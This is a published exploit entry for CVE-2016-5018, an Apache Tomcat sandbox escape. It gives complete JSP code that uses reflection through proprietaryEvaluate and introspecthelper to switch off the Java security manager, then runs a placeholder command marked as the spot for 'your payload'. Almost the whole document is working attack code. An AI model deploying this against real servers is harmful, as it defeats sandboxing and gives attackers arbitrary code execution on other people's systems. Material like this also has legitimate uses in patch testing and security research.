# Exploit Title: Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape
# Date: 2020-01-07
# Exploit Author: Harrison Neal, PatchAdvisor
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.36/bin/apache-tomcat-8.0.36.exe
# Version: 8.0.36
# Description: Tomcat proprietaryEvaluate/introspecthelper Sandbox Escape
# Tested on: Windows
# CVE: CVE-2016-5018
/*
# See https://tomcat.apache.org/tomcat-8.0-doc/security-manager-howto.html for more information about the default sandbox.
# When Tomcat 8 is configured to run as a service, you can use the Tomcat8w.exe tool to enable/disable the security manager.
# In the Java tab, add the following options:
# -Djava.security.manager
# -Djava.security.policy=C:\Program Files\Apache Software Foundation\Tomcat 8.0\conf\catalina.policy
*/
<%@ page import="java.util.*,java.io.*,org.apache.jasper.runtime.*,java.lang.reflect.*"%>
<%
SecurityManager sm = System.getSecurityManager();
if (sm != null) {
try {
ProtectedFunctionMapper pfm = ProtectedFunctionMapper.getInstance();
{ // Tomcat 7+
// Get the desired method
Method[] methods = (Method[]) PageContextImpl.proprietaryEvaluate(
"${pageContext.getServletContext().getClass().getDeclaredMethods()}",
Method[].class, pageContext, pfm /*, false*/); // Uncomment "false" parameter for Tomcat 7
Method theMethod = null;
for (Method m : methods) {
if ("executeMethod".equals(m.getName())) {
theMethod = m;
break;
}
}
// Set it to accessible
JspRuntimeLibrary.introspecthelper(
theMethod,
"accessible",
"true",
request,
null,
false);
// Run it
theMethod.invoke(pageContext.getServletContext(),
System.class.getMethod("setSecurityManager", new Class[]{SecurityManager.class}),
null,
new Object[]{null}
);
}
/*{ // Tomcat 5.5 and 6
pfm.mapFunction("hello:world", System.class, "setSecurityManager", new Class[] { SecurityManager.class });
PageContextImpl.proprietaryEvaluate("${hello:world(null)}", Object.class, pageContext, pfm, false);
}*/
} catch (Throwable ex) {
PrintWriter pw = new PrintWriter(out);
ex.printStackTrace(pw);
pw.flush();
}
}
// Your payload goes here
try {
Runtime.getRuntime().exec("calc");
} catch (Throwable ex) {
PrintWriter pw = new PrintWriter(out);
ex.printStackTrace(pw);
pw.flush();
}
// Optional put the security manager back
if (sm != null) {
System.setSecurityManager(sm);
}
%>